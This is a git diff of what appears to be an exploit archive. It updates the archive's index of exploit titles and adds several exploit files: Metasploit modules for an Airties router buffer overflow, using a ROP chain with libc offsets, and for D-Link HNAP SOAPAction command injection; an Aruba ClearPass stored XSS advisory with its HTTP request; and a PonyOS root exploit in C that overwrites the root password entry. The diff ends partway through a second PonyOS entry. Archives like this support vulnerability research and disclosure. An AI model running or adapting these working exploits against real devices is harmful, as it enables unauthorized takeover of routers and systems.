diff --git a/files.csv b/files.csv index 1978e9376..eb7739393 100755 --- a/files.csv +++ b/files.csv @@ -591,7 +591,7 @@ id,file,description,date,author,platform,type,port 764,platforms/linux/remote/764.c,"Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)",2003-04-04,spabam,linux,remote,80 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 766,platforms/osx/local/766.c,"Mac OS X <= 10.3.7 mRouter Local Privilege Escalation Exploit",2005-01-22,nemo,osx,local,0 -767,platforms/windows/remote/767.pl,"Golden FTP Server <= 2.02b Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21 +767,platforms/windows/remote/767.pl,"Golden FTP Server <= 2.02b - Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21 769,platforms/windows/local/769.c,"Funduc Search and Replace Compressed File Local BoF Exploit",2005-01-24,ATmaCA,windows,local,0 770,platforms/windows/dos/770.txt,"Apple QuickTime <= 6.5.2.10 - (.qtif) Image Parsing Vulnerability",2005-01-24,ATmaCA,windows,dos,0 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 @@ -959,7 +959,7 @@ id,file,description,date,author,platform,type,port 1157,platforms/cgi/webapps/1157.pl,"GTChat <= 0.95 Alpha Remote Denial of Service Exploit",2005-08-18,RusH,cgi,webapps,0 1158,platforms/windows/dos/1158.pl,"WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0 -1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 +1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 - (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Local Privilege Escalation Exploit",2005-04-27,"Reed Arvin",windows,local,0 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server <= 5.14 - Denial of Service Exploit",2005-06-07,"Reed Arvin",windows,dos,0 1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition <= 5.2.2 - DoS Exploit",2005-06-26,"Reed Arvin",windows,dos,0 @@ -1150,7 +1150,7 @@ id,file,description,date,author,platform,type,port 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 -1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21 +1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21 1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0 @@ -1458,7 +1458,7 @@ id,file,description,date,author,platform,type,port 1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0 1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306 1742,platforms/linux/remote/1742.c,"MySQL <= 4.1.18 / 5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 -1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0 +1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0 1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0 1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0 1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0 @@ -2590,7 +2590,7 @@ id,file,description,date,author,platform,type,port 2913,platforms/php/webapps/2913.php,"phpAlbum <= 0.4.1 Beta 6 (language.php) Local File Inclusion Exploit",2006-12-10,Kacper,php,webapps,0 2914,platforms/windows/dos/2914.php,"Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit",2006-12-11,shinnai,windows,dos,0 2915,platforms/hardware/dos/2915.c,"D-Link DWL-2000AP 2.11 (ARP Flood) Remote Denial of Service Exploit",2006-12-11,poplix,hardware,dos,0 -2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0 +2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow PoC",2006-12-11,rgod,windows,dos,0 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 (common.php) Remote Inclusion Vulnerability",2006-12-11,bd0rk,php,webapps,0 2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Include Vulnerability",2006-12-11,3l3ctric-Cracker,php,webapps,0 2920,platforms/php/webapps/2920.txt,"Barman 0.0.1r3 (interface.php) Remote File Include Vulnerability",2006-12-11,DeltahackingTEAM,php,webapps,0 @@ -9558,7 +9558,7 @@ id,file,description,date,author,platform,type,port 10255,platforms/bsd/local/10255.txt,"FreeBSD Run-Time Link-Editor Local r00t (0day)",2009-11-30,kingcope,bsd,local,0 10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21 -10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 File Deletion Vulnerability",2009-12-01,sharpe,windows,remote,21 +10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion Vulnerability",2009-12-01,sharpe,windows,remote,21 10259,platforms/php/webapps/10259.txt,"Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability",2009-12-01,"cr4wl3r ",php,webapps,0 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MYSQL Scripts Admin Bypass",2009-12-01,DUNDEE,php,webapps,0 10261,platforms/linux/webapps/10261.txt,"Dotdefender Remote Command Execution 3.8-5",2009-12-01,"John Dos",linux,webapps,80 @@ -15085,7 +15085,7 @@ id,file,description,date,author,platform,type,port 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,metasploit,windows,remote,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0 -17355,platforms/windows/remote/17355.rb,"GoldenFTP 4.70 PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21 +17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow Vulnerability",2012-04-08,Vulnerability-Lab,windows,dos,0 17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0 @@ -31760,7 +31760,7 @@ id,file,description,date,author,platform,type,port 35241,platforms/windows/remote/35241.pl,"ESTsoft ALZip 8.12.0.3 - (.zip) Buffer Overflow Vulnerability",2011-01-19,"C4SS!0 G0M3S",windows,remote,0 35242,platforms/multiple/remote/35242.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/searchView.jsp searchWord Parameter XSS",2008-04-24,Rob,multiple,remote,0 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE Help Server help/advanced/workingSetManager.jsp workingSet Parameter XSS",2008-04-24,Rob,multiple,remote,0 -35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0 +35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial Of Service Vulnerability",2011-01-19,"Craig Freyman",windows,dos,0 35245,platforms/php/webapps/35245.txt,"PHPAuctions 'viewfaqs.php' SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0 35246,platforms/php/webapps/35246.py,"Joomla HD FLV Player < 2.1.0.1 - Arbitrary File Download Vulnerability",2014-11-15,"Claudio Viviani",php,webapps,0 35248,platforms/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - XSS Vulnerability",2014-11-15,"Halil Dalabasmaz",multiple,webapps,0 @@ -33251,6 +33251,7 @@ id,file,description,date,author,platform,type,port 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0 36994,platforms/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 'DOC' Parameter Directory Traversal Vulnerability",2009-04-17,MustLive,cgi,webapps,0 36995,platforms/hardware/remote/36995.txt,"F5 FirePass <= 7.0 SQL Injection Vulnerability",2012-03-14,anonymous,hardware,remote,0 +37169,platforms/linux/remote/37169.rb,"Realtek SDK Miniigd UPnP SOAP Command Execution",2015-06-01,metasploit,linux,remote,52869 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0 36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0 36853,platforms/php/webapps/36853.txt,"Dolphin 7.0.x viewFriends.php Multiple Parameter XSS",2012-02-21,"Aung Khant",php,webapps,0 @@ -33435,6 +33436,7 @@ id,file,description,date,author,platform,type,port 37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0 +37050,platforms/php/webapps/37050.txt,"Chronosite 5.12 - SQL Injection",2015-05-18,"Wad Deek",php,webapps,0 37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use After Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0 37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0 37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0 @@ -33481,6 +33483,7 @@ id,file,description,date,author,platform,type,port 37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 'username' Parameter Cross Site Scripting Vulnerability",2012-04-20,sonyy,php,webapps,0 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 +37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0 37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0 @@ -33532,4 +33535,20 @@ id,file,description,date,author,platform,type,port 37148,platforms/php/webapps/37148.txt,"Chevereto 1.91 Upload/engine.php v Parameter Traversal Arbitrary File Enumeration",2012-05-10,AkaStep,php,webapps,0 37149,platforms/windows/dos/37149.py,"Private Shell SSH Client 3.3 - Crash PoC",2015-05-29,3unnym00n,windows,dos,22 37151,platforms/php/webapps/37151.txt,"TCPDF Library 5.9 Arbitrary File Deletion",2015-05-29,"Filippo Roncari",php,webapps,80 +37170,platforms/hardware/remote/37170.rb,"Airties login-cgi Buffer Overflow",2015-06-01,metasploit,hardware,remote,0 37154,platforms/hardware/webapps/37154.rb,"ESC 8832 Data Controller Multiple Vulnerabilities",2015-05-29,"Balazs Makany",hardware,webapps,80 +37155,platforms/php/webapps/37155.txt,"WordPress WP-FaceThumb 0.1 'pagination_wp_facethum' Parameter Cross Site Scripting Vulnerability",2012-05-13,d3v1l,php,webapps,0 +37156,platforms/php/webapps/37156.txt,"GetSimple CMS 3.1 admin/theme.php err Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37157,platforms/php/webapps/37157.txt,"GetSimple CMS 3.1 admin/pages.php error Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37158,platforms/php/webapps/37158.txt,"GetSimple CMS 3.1 admin/index.php Multiple Parameter Reflected XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37159,platforms/php/webapps/37159.txt,"GetSimple CMS 3.1 admin/upload.php path Parameter XSS",2012-05-12,"Chokri Ben Achor",php,webapps,0 +37160,platforms/windows/dos/37160.pl,"Universal Reader 1.16.740.0 'uread.exe' Denial Of Service Vulnerability",2012-05-14,demonalex,windows,dos,0 +37161,platforms/php/webapps/37161.txt,"WordPress GRAND Flash Album Gallery 1.71 'admin.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0 +37162,platforms/php/webapps/37162.txt,"Dynamic Widgets WordPress Plugin 1.5.1 'themes.php' Cross Site Scripting Vulnerability",2012-05-15,"Heine Pedersen",php,webapps,0 +37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0 +37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build # 4172) - Buffer OverFlow PoC",2015-06-01,metacom,windows,remote,0 +37166,platforms/php/webapps/37166.php,"WordPress dzs-zoomsounds Plugins <= 2.0 - Remote File Upload Vulnerability",2015-06-01,"nabil chris",php,webapps,0 +37167,platforms/linux/local/37167.c,"PonyOS <= 3.0 - VFS Permissions Exploit",2015-06-01,"Hacker Fantastic",linux,local,0 +37168,platforms/linux/local/37168.txt,"PonyOS <= 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",linux,local,0 +37171,platforms/hardware/remote/37171.rb,"D-Link Devices HNAP SOAPAction-Header Command Execution",2015-06-01,metasploit,hardware,remote,0 +37172,platforms/hardware/webapps/37172.txt,"Aruba ClearPass Policy Manager Stored XSS",2015-06-01,"Cristiano Maruti",hardware,webapps,0 diff --git a/platforms/hardware/remote/37170.rb b/platforms/hardware/remote/37170.rb new file mode 100755 index 000000000..f6572c691 --- /dev/null +++ b/platforms/hardware/remote/37170.rb @@ -0,0 +1,151 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Airties login-cgi Buffer Overflow', + 'Description' => %q{ + This module exploits a remote buffer overflow vulnerability on several Airties routers. + The vulnerability exists in the handling of HTTP queries to the login cgi with long + redirect parametres. The vulnerability doesn't require authentication. This module has + been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation. + Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT, + Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable. + }, + 'Author' => + [ + 'Batuhan Burakcin ', # discovered the vulnerability + 'Michael Messner ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'Arch' => ARCH_MIPSBE, + 'References' => + [ + ['EDB', '36577'], + ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory + ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC + ], + 'Targets' => + [ + [ 'AirTies_Air5650v3TT_FW_1.0.2.0', + { + 'Offset' => 359, + 'LibcBase' => 0x2aad1000, + 'RestoreReg' => 0x0003FE20, # restore s-registers + 'System' => 0x0003edff, # address of system-1 + 'CalcSystem' => 0x000111EC, # calculate the correct address of system + 'CallSystem' => 0x00041C10, # call our system + 'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call + } + ] + ], + 'DisclosureDate' => 'Mar 31 2015', + 'DefaultTarget' => 0)) + + deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/cgi-bin/login', + 'method' => 'GET' + }) + + if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/ + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Unknown + end + + def exploit + print_status("#{peer} - Accessing the vulnerable URL...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") + end + + print_status("#{peer} - Exploiting...") + execute_cmdstager( + :flavour => :echo, + :linemax => 100 + ) + end + + def prepare_shellcode(cmd) + shellcode = rand_text_alpha_upper(target['Offset']) # padding + shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values + + # 0003FE20 lw $ra, 0x48+var_4($sp) + # 0003FE24 lw $s7, 0x48+var_8($sp) + # 0003FE28 lw $s6, 0x48+var_C($sp) + # 0003FE2C lw $s5, 0x48+var_10($sp) + # 0003FE30 lw $s4, 0x48+var_14($sp) + # 0003FE34 lw $s3, 0x48+var_18($sp) + # 0003FE38 lw $s2, 0x48+var_1C($sp) + # 0003FE3C lw $s1, 0x48+var_20($sp) + # 0003FE40 lw $s0, 0x48+var_24($sp) + # 0003FE44 jr $ra + # 0003FE48 addiu $sp, 0x48 + + shellcode << rand_text_alpha_upper(36) # padding + shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1 + shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4 + shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system + + # 00041C10 move $t9, $s0 + # 00041C14 jalr $t9 + # 00041C18 nop + + shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7 + shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parametre for call to system + + # 000215B8 addiu $a0, $sp, 0x20 + # 000215BC lw $ra, 0x1C($sp) + # 000215C0 jr $ra + # 000215C4 addiu $sp, 0x20 + + shellcode << rand_text_alpha_upper(28) # padding + shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address) + + # 000111EC move $t9, $s5 + # 000111F0 jalr $t9 + # 000111F4 addiu $s0, 1 + + shellcode << cmd + end + + def execute_command(cmd, opts) + shellcode = prepare_shellcode(cmd) + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/cgi-bin/login', + 'encode_params' => false, + 'vars_post' => { + 'redirect' => shellcode, + 'user' => rand_text_alpha(5), + 'password' => rand_text_alpha(8) + } + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + end +end \ No newline at end of file diff --git a/platforms/hardware/remote/37171.rb b/platforms/hardware/remote/37171.rb new file mode 100755 index 000000000..b1dac5c16 --- /dev/null +++ b/platforms/hardware/remote/37171.rb @@ -0,0 +1,118 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution', + 'Description' => %q{ + Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP + interface. Since it is a blind OS command injection vulnerability, there is no + output for the executed command. This module has been tested on a DIR-645 device. + The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, + DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, + DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR + }, + 'Author' => + [ + 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 + 'Craig Heffner', # independent Vulnerability discovery on different other routers + 'Michael Messner ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], + ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] + ], + 'DisclosureDate' => 'Feb 13 2015', + 'Privileged' => true, + 'Platform' => 'linux', + 'Targets' => + [ + [ 'MIPS Little Endian', + { + 'Arch' => ARCH_MIPSLE + } + ], + [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target + { + 'Arch' => ARCH_MIPSBE + } + ] + ], + 'DefaultTarget' => 0 + )) + + deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') + end + + def check + uri = '/HNAP1/' + soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + 'headers' => { + 'SOAPAction' => soap_action, + } + }) + + if res && [200].include?(res.code) && res.body =~ /D-Link/ + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Unknown + end + + def exploit + print_status("#{peer} - Trying to access the device ...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") + end + + print_status("#{peer} - Exploiting...") + + execute_cmdstager( + :flavour => :echo, + :linemax => 200, + :temp => '' + ) + end + + def execute_command(cmd, opts) + + uri = '/HNAP1/' + + # we can not use / in our command so we need to use a little trick + cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd + soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + 'headers' => { + 'SOAPAction' => soap_action, + } + }, 3) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + end +end \ No newline at end of file diff --git a/platforms/hardware/webapps/37172.txt b/platforms/hardware/webapps/37172.txt new file mode 100755 index 000000000..5850b9782 --- /dev/null +++ b/platforms/hardware/webapps/37172.txt @@ -0,0 +1,87 @@ +=============================================================================== + title: ClearPass Policy Manager Stored XSS + case id: CM-2014-01 + product: Aruba ClearPass Policy Manager + vulnerability type: Stored cross-site script + severity: Medium + found: 2014-11-24 + by: Cristiano Maruti (@cmaruti) +=============================================================================== + +[EXECUTIVE SUMMARY] + + The analysis discovered a stored cross site scripting vulnerability (OWASP + OTG-INPVAL-002) in the ClearPass Policy Manager. A malicious unauthenticated + user is able to inject arbitrary script through the login form that may be + rendered and triggered later if a privileged authenticated user reviews the + access audit record. An attack can use the aforementioned vulnerability to + effectively steal session cookies of privileged logged on users. + +[VULNERABLE VERSIONS] + +The following version of the Aruba ClearPass Policy Manager was affected by the +vulnerability; previous versions may be vulnerable as well: +- Aruba ClearPass Policy Manager 6.4 + +[TECHNICAL DETAILS] + +It is possible to reproduce the vulnerability following these steps: +1. Open the login page with your browser; +2. Put the "><" string in the username field +and fill in the password field with a value of your choice; +3. Submit the form; +4. Login to the application with an administrative user: +5. Go to "Monitoring -> Live monitoring -> Access tracker" to raise the payload. + +Below a full transcript of the HTTP request used to raise the vulnerability +HTTP Request +------------------------------------------------------------------------------- +POST /tips/tipsLoginSubmit.action HTTP/1.1 +Host: 10.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: https://10.0.0.1/tips/tipsLoginSubmit.action +Cookie: +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 58 + +username="><"&password=test +------------------------------------------------------------------------------- + +A copy of the report with technical details about the vulnerability I have +identified is available at: +https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf + + +[VULNERABILITY REFERENCE] + +The following CVE ID was allocated to track the vulnerability: +- CVE-2015-1389: Stored cross-site scripting (XSS) + +[DISCLOSURE TIMELINE] + +2014-11-24 Vulnerability submitted to vendor through the Bugcrowd +bounty program. +2014-12-09 Vendor acknowledged the problem. +2014-12-10 Researcher requested to publicly disclose the issue. +2015-02-16 Vendor released a fix for the reported issue. +2015-02-09 Vendor asked to hold-on for the public disclosure. +2015-02-22 Vendor postponed the public disclosure date +2015-02-22 Public coordinated disclosure. + + + +[SOLUTION] + +Aruba release an update to fix the vulnerability (ClearPass 6.5 or +later). Please see +the below link for further information released by the vendor: +- http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-006.txt + + +[REPORT URL] + +https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf \ No newline at end of file diff --git a/platforms/linux/local/37167.c b/platforms/linux/local/37167.c new file mode 100755 index 000000000..2321272c1 --- /dev/null +++ b/platforms/linux/local/37167.c @@ -0,0 +1,65 @@ +# Exploit Title: PonyOS <= 3.0 VFS permissions exploit +# Google Dork: [if applicable] +# Date: 29th May 2015 +# Exploit Author: Hacker Fantastic +# Vendor Homepage: www.ponyos.org +# Software Link: [download link if available] +# Version: 3.0 +# Tested on: 3.0 +# CVE : N/A + +# Source: https://github.com/HackerFantastic/Public/blob/master/exploits/rarity.c + +/* MyLittleUnix <= 3.0 VFS permissions root exploit + ================================================ + File permissions are not checked, we can abuse + this to replace the root user password with our + own and escalate our privileges. This exploit + now 20% cooler and tested on latest 3.0 mlp OS. + + -- prdelka +*/ +#include +#include +#include +#include +#include +#include + +char* pwnystr = "root:07821d2459368443042007bf1c7cdf3c55284" + "29a65f8f10ce388d301b47865a283147bfd290545b" + "0b9b12ae622a8eb359497cb3635506f99d2f5e4c4e" + "594cadd:0:0:HackerFantastic:/home/root:/bi" + "n/sh:fancy\n"; + +int main(){ + int fd, r; + struct stat *fileinfo = malloc(sizeof(struct stat)); + char *buffer, *line, *filenm = "/etc/master.passwd"; + printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n"); + fd = open(filenm,O_RDWR); + r = stat(filenm,fileinfo); + buffer = malloc((uint)fileinfo->st_size); + if(buffer){ + read(fd,buffer,fileinfo->st_size); + } + else{ + printf("[!] No pwn for you pwnie\n"); + exit(0); + } + lseek(fd,0,SEEK_SET); + line = strtok(buffer,"\n"); + while(line){ + if(strstr(line,"root:")){ + write(fd,pwnystr,strlen(pwnystr)); + } + else{ + write(fd,line,strlen(line)); + write(fd,"\n",strlen("\n")); + } + line = strtok(NULL,"\n"); + } + close(fd); + printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n"); + exit(0); +} \ No newline at end of file diff --git a/platforms/linux/local/37168.txt b/platforms/linux/local/37168.txt new file mode 100755 index 000000000..bb04531d5 --- /dev/null +++ b/platforms/linux/local/37168.txt @@ -0,0 +1,14 @@ +# Exploit Title: PonyOS <= 3.0 ELF loader privilege escalation +# Google Dork: [if applicable] +# Date: 29th May 2015 +# Exploit Author: Hacker Fantastic +# Vendor Homepage: www.ponyos.org +# Software Link: [download link if available] +# Version: 3.0 +# Tested on: 3.0 +# CVE : 